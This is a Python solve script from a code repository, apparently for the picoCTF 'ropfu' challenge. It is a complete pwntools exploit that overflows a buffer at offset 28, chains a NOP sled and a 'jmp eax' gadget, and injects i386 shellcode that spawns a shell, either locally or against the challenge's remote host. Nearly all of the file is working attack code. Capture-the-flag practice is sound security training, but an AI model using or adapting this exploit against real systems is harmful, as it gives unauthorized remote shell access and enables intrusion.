Files
hacc/pwn/ropfu/solve.py
T
2026-07-03 17:02:59 +09:00

44 lines
975 B
Python
Executable File

#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "saturn.picoctf.net 60930".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"))
offset = 28 # found with pwndbg
rop = ROP(exe)
jmp_eax = asm('jmp $+0x6') # 2 for jmp + 4 for ret address
for _ in range(offset - len(jmp_eax)):
rop.raw(asm('nop'))
rop.raw(jmp_eax)
# NOTE: rop.find_gadget(['jmp eax'])[0] Does not work because it does not end with 'ret'
jmp_eax_gadget = next(exe.search(asm("jmp eax")))
rop.raw(jmp_eax_gadget)
rop.raw(asm(shellcraft.i386.linux.sh()))
r.sendline(rop.chain())
r.interactive()
r.close()
if __name__ == "__main__":
main()